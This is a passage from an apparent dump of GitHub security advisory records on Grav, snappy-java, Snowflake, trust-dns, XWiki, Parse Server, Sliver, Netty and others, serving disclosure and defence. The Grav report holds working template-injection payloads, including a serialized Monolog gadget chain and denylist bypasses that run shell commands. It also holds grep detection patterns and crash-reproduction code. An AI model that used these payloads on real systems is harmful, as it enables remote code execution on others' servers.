return true; } if (in_array($name, $fileContentFunctions)) { return true; } if (in_array($name, $filesystemFunctions)) { return true; } return false; } ~~~ The list of banned functions appears to be adapted from a [StackOverflow post](https://stackoverflow.com/a/3697776). While the denylist looks rather comprehensive, there are actually multiple issues with the denylist implementation: 1. There may be unsafe functions, be it built-in to PHP or user-defined, which are not be blocked. For example, `unserialize()` and aliases of blocked functions, such as `ini_alter()`, are not being included in the denylist. 2. A case-sensitive comparison is performed against the denylist, but PHP function names are case-insensitive. This allows using `filter('SYSTEM')` to trivially bypass the denylist validation check. 3. Fully qualified names can be used when referencing functions, allowing `filter('\system')` to trivially bypass the denylist validation checks. ## Exploit Conditions: This vulnerability can be exploited if the attacker has access to: 1. an administrator account, or 2. a non-administrative user account with the following permissions granted: - login access to Grav admin panel, and - page creation or update rights ## Reproduction Steps: 1. Log in to Grav Admin using an administrator account. 2. Navigate to `Accounts > Add`, and ensure that the following permissions are assigned when creating a new low-privileged user: * Login to Admin - Allowed * Page Update - Allowed 3. Log out of Grav Admin, and log back in using the account created in step 2. 4. Navigate to `http:///admin/pages/home`. 5. Click the `Advanced` tab and select the checkbox beside `Twig` to ensure that Twig processing is enabled for the modified webpage. 6. Under the `Content` tab, insert the following payload within the editor: ~~~twig // Method 1: Using unserialize() to trigger system('id') call // Serialized payloaed generated using the phpggc tool: ./phpggc -b Monolog/RCE7 system 'id' // {{ 'TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aTowO319czoxMzoiACoAcHJvY2Vzc29ycyI7YToyOntpOjA7czozOiJwb3MiO2k6MTtzOjY6InN5c3RlbSI7fX0=' | base64_decode | array | filter('unserialize') }} // Method 2: Trigger system('id') via case-insensitive function names {{ ['id'] | filter('System') }} // Method 3: Trigger system('id') via fully qualified names when referencing functions {{ ['id'] | filter('\\system') }} ~~~ 7. Click the Preview button. Observe that the output of the `id` shell command is returned in the preview. ## Suggested Mitigations: It is recommended to review the list of functions, both default functions in PHP and user-defined functions, and include missing unsafe functions in the denylist. A non-exhaustive list of missing unsafe functions discovered is shown below: - `unserialize()` - `ini_alter()` - `simplexml_load_file()` - `simplexml_load_string()` - `forward_static_call()` - `forward_static_call_array()` The `Utils::isDangerousFunction()` function in [/system/src/Grav/Common/Utils.php](https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1956-L2074) should also be patched to disallow usage of fully qualified names when specifying callables, as well as ensure that validation performed on the `$name` parameter is case-insensitive. For example, ~~~diff php ... abstract class Utils { ... /** * @param string $name * @return bool */ public static function isDangerousFunction(string $name): bool { ... + if ($arrow instanceof Closure) { + return false; + } + $name = strtolower($name); + if (strpos($name, ""\\"") !== false) { + return false; + } if (in_array($name, $commandExecutionFunctions)) { return true; } if (in_array($name, $codeExecutionFunctions)) { return true; } if (isset($callbackFunctions[$name])) { return true; } if (in_array($name, $informationDiscosureFunctions)) { return true; } if (in_array($name, $otherFunctions)) { return true; } return static::isFilesystemFunction($name); } ... } ~~~ End users should also ensure that `twig.undefined_functions` and `twig.undefined_filters` properties in `/path/to/webroot/system/config/system.yaml` configuration file are set to `false` to disallow Twig from treating undefined filters/functions as PHP functions and executing them. ## Detection Guidance: The following strategies may be used to detect potential exploitation attempts. 1. Searching within Markdown pages using the following shell command: `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\|\s*(filter|map|reduce))\s*\(' /path/to/webroot/user/pages/` 2. Searching within Doctrine cache data using the following shell command: `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\|\s*(filter|map|reduce))\s*\(' --include '*.doctrinecache.data' /path/to/webroot/cache/` 3. Searching within Twig cache using the following shell command: `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|twig_array_(filter|map|reduce))\s*\(' /path/to/webroot/cache/twig/` 4. Searching within compiled Twig template files using the following shell command: `grep -Priz -e '(ini_alter|unserialize|simplexml_load_file|simplexml_load_string|forward_static_call|forward_static_call_array|\|\s*(filter|map|reduce))\s*\(' /path/to/webroot/cache/compiled/files/` Note that it is not possible to detect indicators of compromise reliably using the Grav log file (located at `/path/to/webroot/logs/grav.log` by default), as successful exploitation attempts do not generate any additional logs. However, it is worthwhile to examine any PHP errors or warnings logged to determine the existence of any failed exploitation attempts. ## Credits: Ngo Wei Lin ([@Creastery](https://twitter.com/Creastery)) & Wang Hengyue ([@w_hy_04](https://twitter.com/w_hy_04)) of STAR Labs SG Pte. Ltd. ([@starlabs_sg](https://twitter.com/starlabs_sg)) The scheduled disclosure date is _**25th July, 2023**_. Disclosure at an earlier date is also possible if agreed upon by all parties. Kindly note that STAR Labs reserved and assigned the following CVE identifiers to the respective vulnerabilities presented in this report: 1. **CVE-2023-30592** Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of unsafe functions, such as `unserialize()`, that are not blocked. This is a bypass of CVE-2022-2073. 2. **CVE-2023-30593** Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of capitalised names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073. 3. **CVE-2023-30594** Server-side Template Injection (SSTI) in getgrav/grav <= v1.7.40 allows Grav Admin users with page creation or update rights to bypass the dangerous functions denylist check in `Utils::isDangerousFunction()` and to achieve remote code execution via usage of fully-qualified names, supplied as strings, when referencing callables. This is a bypass of CVE-2022-2073.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'getgrav/grav'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.42'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34253'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5'}, {'type': 'PACKAGE', 'url': 'https://github.com/getgrav/grav'}, {'type': 'WEB', 'url': 'https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/'}, {'type': 'WEB', 'url': 'https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83'}]","{'cwe_ids': ['CWE-1336', 'CWE-94'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-16T19:36:52Z', 'nvd_published_at': None}" 1.4.0,GHSA-pqr6-cmr2-h8hf,2023-06-27T21:57:08Z,2023-06-15T16:13:20Z,,['CVE-2023-34453'],snappy-java's Integer Overflow vulnerability in shuffle leads to DoS,"## Summary Due to unchecked multiplications, an integer overflow may occur, causing a fatal error. ## Impact Denial of Service ## Description The function [shuffle(int[] input)](https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107) in the file [BitShuffle.java](https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java) receives an array of integers and applies a bit shuffle on it. It does so by multiplying the length by 4 and passing it to the natively compiled shuffle function. ```java public static byte[] shuffle(int[] input) throws IOException { byte[] output = new byte[input.length * 4]; int numProcessed = impl.shuffle(input, 0, 4, input.length * 4, output, 0); assert(numProcessed == input.length * 4); return output; } ``` Since the length is not tested, the multiplication by four can cause an integer overflow and become a smaller value than the true size, or even zero or negative. In the case of a negative value, a “java.lang.NegativeArraySizeException” exception will raise, which can crash the program. In a case of a value that is zero or too small, the code that afterwards references the shuffled array will assume a bigger size of the array, which might cause exceptions such as “java.lang.ArrayIndexOutOfBoundsException”. The same issue exists also when using the “shuffle” functions that receive a double, float, long and short, each using a different multiplier that may cause the same issue. ## Steps To Reproduce Compile and run the following code: ```java package org.example; import org.xerial.snappy.BitShuffle; import java.io.*; public class Main { public static void main(String[] args) throws IOException { int[] original = new int[0x40000000]; byte[] shuffled = BitShuffle.shuffle(original); System.out.println(shuffled[0]); } } ``` The program will crash, showing the following error (or similar): ``` Exception in thread ""main"" java.lang.ArrayIndexOutOfBoundsException: Index 0 out of bounds for length 0 at org.example.Main.main(Main.java:12) Process finished with exit code 1 ``` Alternatively - compile and run the following code: ```java package org.example; import org.xerial.snappy.BitShuffle; import java.io.*; public class Main { public static void main(String[] args) throws IOException { int[] original = new int[0x20000000]; byte[] shuffled = BitShuffle.shuffle(original); } } ``` The program will crash with the following error (or similar): ``` Exception in thread ""main"" java.lang.NegativeArraySizeException: -2147483648 at org.xerial.snappy.BitShuffle.shuffle(BitShuffle.java:108) at org.example.Main.main(Main.java:11) ```","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xerial.snappy:snappy-java'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.1.10.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 1.1.10.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/security/advisories/GHSA-pqr6-cmr2-h8hf'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34453'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/commit/820e2e074c58748b41dbd547f4edba9e108ad905'}, {'type': 'PACKAGE', 'url': 'https://github.com/xerial/snappy-java'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/05c39b2ca9b5b7b39611529cc302d3d796329611/src/main/java/org/xerial/snappy/BitShuffle.java#L107'}, {'type': 'WEB', 'url': 'https://github.com/xerial/snappy-java/blob/master/src/main/java/org/xerial/snappy/BitShuffle.java'}]","{'cwe_ids': ['CWE-190'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-15T16:13:20Z', 'nvd_published_at': None}" 1.4.0,GHSA-5w5m-pfw9-c8fp,2023-06-16T22:09:31Z,2023-06-09T22:53:14Z,,['CVE-2023-34233'],Snowflake Python Connector vulnerable to Command Injection,"### Issue Snowflake was informed via our bug bounty program of a command injection vulnerability in the Snowflake Python connector via SSO browser URL authentication. ### Impacted driver package: snowflake-connector-python ### Impacted version range: before [Version 3.0.2](https://community.snowflake.com/s/article/Snowflake-Connector-for-Python-Release-Notes) ### Attack Scenario In order to exploit the potential for command injection, an attacker would need to be successful in (1) establishing a malicious resource and (2) redirecting users to utilize the resource. The attacker could set up a malicious, publicly accessible server which responds to the SSO URL with an attack payload. If the attacker then tricked a user into visiting the maliciously crafted connection URL, the user’s local machine would render the malicious payload, leading to a remote code execution. This attack scenario can be mitigated through URL whitelisting as well as common anti-phishing resources. ### Solution On March 23rd, 2023, Snowflake merged a patch that fixed a command injection vulnerability in the Snowflake Python connector via SSO browser URL authentication. The vulnerability affected the Snowflake Python connector before Version 3.0.2. We strongly recommend users upgrade to Version 3.0.2 as soon as possible via the following resources: [Snowflake Python Connector](https://docs.snowflake.com/en/developer-guide/python-connector/python-connector) ### Additional Information If you discover a security vulnerability in one of our products or websites, please report the issue to HackerOne. For more information, please see our [Vulnerability Disclosure Policy](https://hackerone.com/snowflake?type=team).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'snowflake-connector-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-python/security/advisories/GHSA-5w5m-pfw9-c8fp'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34233'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-python/pull/1480'}, {'type': 'WEB', 'url': 'https://github.com/snowflakedb/snowflake-connector-python/commit/1cdbd3b1403c5ef520d7f4d9614fe35165e101ac'}, {'type': 'WEB', 'url': 'https://github.com/pypa/advisory-database/tree/main/vulns/snowflake-connector-python/PYSEC-2023-88.yaml'}, {'type': 'PACKAGE', 'url': 'https://github.com/snowflakedb/snowflake-connector-python'}]","{'cwe_ids': ['CWE-77'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-09T22:53:14Z', 'nvd_published_at': None}" 1.4.0,GHSA-5fm9-h728-fwpj,2023-06-06T02:06:23Z,2023-06-06T02:06:23Z,,[],trust-dns vulnerable to Remote Attackers causing Denial-of-Service (packet loops) with crafted DNS packets,"trust-dns and trust-dns-server are vulnerable to remotely triggered denial-of-service attacks, consuming both network and CPU resources. DNS messages with the QR=1 bit set are responded to with a `FormErr` response. This allows creating a traffic loop, in which these `FormErr` responses are sent nonstop between vulnerable servers. There are two scenarios how this can be exploited: 1) Create a loop between two instances of trust-dns, consuming network resources, or 2) consuming the CPU of a single instance. With two instances *A* and *B* an attacker sends a DNS query with a spoofed source IP address to *A*. *A* replies with a `FormErr` to *B*. Now both servers with ping-pong the message back and forth until by chance the packet is dropped in the network. Multiple spoofed packets can be sent by the attacker, increasing resource consumption. A single server can get locked up replying to itself. Same setup as above, but now *A* sends the reply to itself. The packet is sent out as fast as the CPU and network stack manage. This locks up a CPU core. Multiple packets from the attacker consume multiple CPU cores. ",[],"[{'package': {'ecosystem': 'crates.io', 'name': 'trust-dns-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.22.1'}]}]}, {'package': {'ecosystem': 'crates.io', 'name': 'trust-dns-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0.23.0-alpha.2'}, {'fixed': '0.23.0-alpha.3'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/bluejekyll/trust-dns/pull/1952'}, {'type': 'PACKAGE', 'url': 'https://github.com/bluejekyll/trust-dns'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2023-0041.html'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-06T02:06:23Z', 'nvd_published_at': None}" 1.4.0,GHSA-7vr7-cghh-ch63,2023-06-20T16:45:32Z,2023-06-20T16:45:32Z,,['CVE-2023-34467'],XWiki Platform may retrieve email addresses of all users ,"### Impact The mail obfuscation configuration was not fully taken into account and while the mail displayed to the end user was obfuscated: - the rest response was also containing the mail unobfuscated - user were able to filter and sort on the unobfuscated (allowing to infer the mail content) The consequence was the possibility to retrieve the email addresses of all users even when obfuscated. See https://jira.xwiki.org/browse/XWIKI-20333 for the reproduction steps. ### Patches This has been patched in XWiki 14.10.4, XWiki 14.4.8, and XWiki 15.0-rc-1. ### Workarounds The workaround is to modify the page `XWiki.LiveTableResultsMacros` following this [patch](https://github.com/xwiki/xwiki-platform/commit/71f889db9962df2d385f4298e29cfbc9050b828a#diff-5a739e5865b1f1ad9d79b724791be51b0095a0170cc078911c940478b13b949a). ### References https://jira.xwiki.org/browse/XWIKI-20333 ### For more information If you have any questions or comments about this advisory: * Open an issue in [Jira XWiki.org](https://jira.xwiki.org/) * Email us at [Security Mailing List](mailto:security@xwiki.org) ### Attribution This vulnerability has been reported on Intigriti by @floerer","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.5-milestone-1'}, {'fixed': '14.4.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-livetable-ui'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '14.5'}, {'fixed': '14.10.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-7vr7-cghh-ch63'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34467'}, {'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/commit/71f889db9962df2d385f4298e29cfbc9050b828a#diff-5a739e5865b1f1ad9d79b724791be51b0095a0170cc078911c940478b13b949a'}, {'type': 'PACKAGE', 'url': 'https://github.com/xwiki/xwiki-platform'}, {'type': 'WEB', 'url': 'https://jira.xwiki.org/browse/XWIKI-20333'}]","{'cwe_ids': ['CWE-402', 'CWE-668'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-20T16:45:32Z', 'nvd_published_at': None}" 1.4.0,GHSA-6vf2-mfmr-qqqw,2023-06-27T21:59:44Z,2023-06-20T15:31:09Z,,['CVE-2020-21489'],Liufee CMS File Upload vulnerability,"File Upload vulnerability in Liufee CMS, AKA Feehicms v.2.0.8 allows a remote attacker to execute arbitrary code via the `/admin/index.php?r=admin-user%2Fupdate-self` component.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'feehi/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-21489'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/issues/46'}, {'type': 'WEB', 'url': 'https://github.com/liufee/cms/commit/ecbfb0ca77874ead5b6e79b96a5e1f94e67475a9'}, {'type': 'PACKAGE', 'url': 'https://github.com/liufee/cms'}]","{'cwe_ids': ['CWE-434'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:09:36Z', 'nvd_published_at': None}" 1.4.0,GHSA-462x-c3jw-7vr6,2023-06-30T20:41:43Z,2023-06-30T20:41:43Z,,['CVE-2023-36475'],Parse Server vulnerable to remote code execution via MongoDB BSON parser through prototype pollution,"### Impact An attacker can use this prototype pollution sink to trigger a remote code execution through the MongoDB BSON parser. ### Patches Prevent prototype pollution in MongoDB database adapter. ### Workarounds Disable remote code execution through the MongoDB BSON parser. ### Credits - Discovered by hir0ot working with Trend Micro Zero Day Initiative - Fixed by dbythy - Reviewed by mtrezza ### References - https://github.com/parse-community/parse-server/security/advisories/GHSA-462x-c3jw-7vr6 - https://github.com/advisories/GHSA-prm5-8g2m-24gg ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.5.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'parse-server'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/security/advisories/GHSA-462x-c3jw-7vr6'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-36475'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/issues/8674'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/issues/8675'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/3dd99dd80e27e5e1d99b42844180546d90c7aa90'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/commit/5fad2928fb8ee17304abcdcf259932f827d8c81f'}, {'type': 'PACKAGE', 'url': 'https://github.com/parse-community/parse-server'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/releases/tag/5.5.2'}, {'type': 'WEB', 'url': 'https://github.com/parse-community/parse-server/releases/tag/6.2.1'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:41:43Z', 'nvd_published_at': None}" 1.4.0,GHSA-784x-7w88-w564,2023-06-19T22:46:34Z,2023-06-19T06:30:42Z,,['CVE-2023-34602'],JeecgBoot vulnerable to SQL injection in queryTableDictItemsByCode,JeecgBoot up to v 3.5.1 was discovered to contain a SQL injection vulnerability via the component `queryTableDictItemsByCode` in method `org.jeecg.modules.api.controller.SystemApiController`.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.jeecgframework.boot:jeecg-boot-parent'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.5.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34602'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/issues/4983'}, {'type': 'WEB', 'url': 'https://github.com/jeecgboot/jeecg-boot/commit/dd7bf104e7ed59142909567ecd004335c3442ec5'}, {'type': 'PACKAGE', 'url': 'https://github.com/jeecgboot/jeecg-boot'}]","{'cwe_ids': ['CWE-89'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-19T22:46:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-5wrg-8fxp-cx9r,2023-06-21T22:06:22Z,2023-06-21T22:06:22Z,,[],passport-wsfed-saml2 Signature Bypass vulnerability,"## Information Please note that this is not a new disclosure, and is previously reported in our [SECURITY-NOTICE.md](https://github.com/auth0/passport-wsfed-saml2/commit/520b9fc0bb4249ce83bec47e30153419f086ab70 ) which we removed in favor of github advisory. # Overview A vulnerability was found in the validation of a SAML signature. The validation doesn't ensure that the ""Signature"" tag is at the proper location inside an ""Assertion"" tag. This leads to a signature relocation attack where the attacker can corrupt one field of data while maintaining the signature valid. This could allow an authenticated attacker to ""remove"" one group from the assertion or corrupt another field of an assertion. # Am I affected? You are affected if you are using the passport-wsfed-saml2 library to version < 3.0.10 # How do I fix it? You may fix this issue by upgrading passport-wsfed-saml2 library to version 3.0.10 or above. # Will the fix impact my users? This fix patches the library that your application runs, but will not impact your users, their current state, or any existing sessions. ",[],"[{'package': {'ecosystem': 'npm', 'name': 'passport-wsfed-saml2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.0.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/auth0/passport-wsfed-saml2/security/advisories/GHSA-5wrg-8fxp-cx9r'}, {'type': 'WEB', 'url': 'https://github.com/auth0/passport-wsfed-saml2/pull/79'}, {'type': 'WEB', 'url': 'https://github.com/auth0/passport-wsfed-saml2/commit/f75211d42d2586a0d24a9da29ba8590e42363500'}, {'type': 'PACKAGE', 'url': 'https://github.com/auth0/passport-wsfed-saml2'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:06:22Z', 'nvd_published_at': None}" 1.4.0,GHSA-8jxm-xp43-qh3q,2023-06-30T20:22:45Z,2023-06-21T22:08:34Z,,['CVE-2023-34758'],Silver vulnerable to MitM attack against implants due to a cryptography vulnerability,"### Summary The current cryptography implementation in Sliver up to version 1.5.39 allows a MitM with access to the corresponding implant binary to execute arbitrary codes on implanted devices via intercepted and crafted responses. (Reserved CVE ID: CVE-2023-34758) ### Details Please see [the PoC repo](https://github.com/tangent65536/Slivjacker). ### PoC Please also see [the PoC repo](https://github.com/tangent65536/Slivjacker). To setup a simple PoC environment, 1. Generate an implant with its C2 set to the PoC server's address and copy the embedded private implant key and public server key into the config json. 2. Run the implant on a separate VM and a `notepad.exe` window should pop up on the implanted VM. ### Impact A successful attack grants the attacker permission to execute arbitrary code on the implanted device. ### References https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go https://github.com/tangent65536/Slivjacker ### Credits [Ting-Wei Hsieh](https://github.com/tangent65536) from [CHT Security Co. Ltd.](https://www.chtsecurity.com/?lang=en)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/bishopfox/sliver'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.5.0'}, {'fixed': '1.5.40'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/security/advisories/GHSA-8jxm-xp43-qh3q'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-34758'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-35170'}, {'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/commit/2d1ea6192cac2ff9d6450b2d96043fdbf8561516'}, {'type': 'PACKAGE', 'url': 'https://github.com/BishopFox/sliver'}, {'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/crypto.go'}, {'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/blob/master/implant/sliver/cryptography/implant.go'}, {'type': 'WEB', 'url': 'https://github.com/BishopFox/sliver/releases/tag/v1.5.40'}, {'type': 'ADVISORY', 'url': 'https://github.com/advisories/GHSA-8jxm-xp43-qh3q'}, {'type': 'WEB', 'url': 'https://github.com/tangent65536/Slivjacker'}, {'type': 'WEB', 'url': 'https://www.chtsecurity.com/news/04f41dcc-1851-463c-93bc-551323ad8091'}]","{'cwe_ids': ['CWE-327'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2023-06-21T22:08:34Z', 'nvd_published_at': None}" 1.4.0,GHSA-fmrf-p77g-vv5c,2023-07-07T16:30:42Z,2023-06-30T18:31:02Z,,['CVE-2023-37302'],MediaWiki Cross-site Scripting vulnerability,An issue was discovered in SiteLinksView.php in Wikibase in MediaWiki through 1.39.3. There is XSS via a crafted badge title attribute. This is also related to lack of escaping in wbTemplate (from resources/wikibase/templates.js) for quotes (which can be in a title attribute).,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'wikibase/wikibase'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.39.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2023-37302'}, {'type': 'WEB', 'url': 'https://gerrit.wikimedia.org/r/c/mediawiki/extensions/Wikibase/+/933649'}, {'type': 'WEB', 'url': 'https://gerrit.wikimedia.org/r/c/mediawiki/extensions/Wikibase/+/933650'}, {'type': 'PACKAGE', 'url': 'https://github.com/wikimedia/mediawiki'}, {'type': 'WEB', 'url': 'https://phabricator.wikimedia.org/T339111'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2023-06-30T20:25:26Z', 'nvd_published_at': None}" 1.4.0,GHSA-6mjq-h674-j845,2023-06-23T13:56:06Z,2023-06-20T16:33:22Z,,['CVE-2023-34462'],netty-handler SniHandler 16MB allocation,"### Summary The `SniHandler` can allocate up to 16MB of heap for each channel during the TLS handshake. When the handler or the channel does not have an idle timeout, it can be used to make a TCP server using the `SniHandler` to allocate 16MB of heap. ### Details The `SniHandler` class is a handler that waits for the TLS handshake to configure a `SslHandler` according to the indicated server name by the `ClientHello` record. For this matter it allocates a `ByteBuf` using the value defined in the `ClientHello` record. Normally the value of the packet should be smaller than the handshake packet but there are not checks done here and the way the code is written, it is possible to craft a packet that makes the `SslClientHelloHandler` 1/ allocate a 16MB `ByteBuf` 2/ not fail `decode` method `in` buffer 3/ get out of the loop without an exception The combination of this without the use of a timeout makes easy to connect to a TCP server and allocate 16MB of heap memory per connection. ### Impact If the user has no idle timeout handler configured it might be possible for a remote peer to send a client hello packet which lead the server to buffer up to 16MB of data per connection. This could lead to a OutOfMemoryError and so result in a DDOS.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'io.netty:netty-handler'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, 